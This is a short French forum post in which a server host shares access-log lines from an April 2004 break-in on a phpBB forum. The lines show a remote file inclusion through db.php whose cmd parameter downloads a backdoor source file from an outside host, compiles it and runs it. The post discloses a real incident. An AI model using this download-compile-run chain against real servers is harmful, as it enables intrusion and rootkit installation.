Un serveur que j'héberge a ete hacké (rootkit) vendredi dernier.
Pour ceux que ca interesse, voila la technique que le gars a utilisé :
66.6.80.X - - [18/Apr/2004:01:05:29 +0200] "GET /forums/includes/db.php?phpbb_root_path=
http://sperwill-usa.com/(...)
&dbms=mysql&phpEx=txt&cmd=wget%20sperwill-usa.com/acatalog/bacdoor.c%20-P%20/tmp HTTP/1.0" 200 145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.6.80.X - - [18/Apr/2004:01:05:54 +0200] "GET /forums/includes/db.php?phpbb_root_path=
http://sperwill-usa.com/(...)
&dbms=mysql&phpEx=txt&cmd=gcc%20/tmp/bacdoor.c%20-o%20/tmp/abc HTTP/1.0" 200 145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.6.80.X - - [18/Apr/2004:01:06:01 +0200] "GET /forums/includes/db.php?phpbb_root_path=
http://sperwill-usa.com/(...)&dbms=mysql&phpEx=txt&cmd=/tmp/abc HTTP/1.0" 200 182 "-" "Mozilla/4.0 (compatible; MSIE
(…)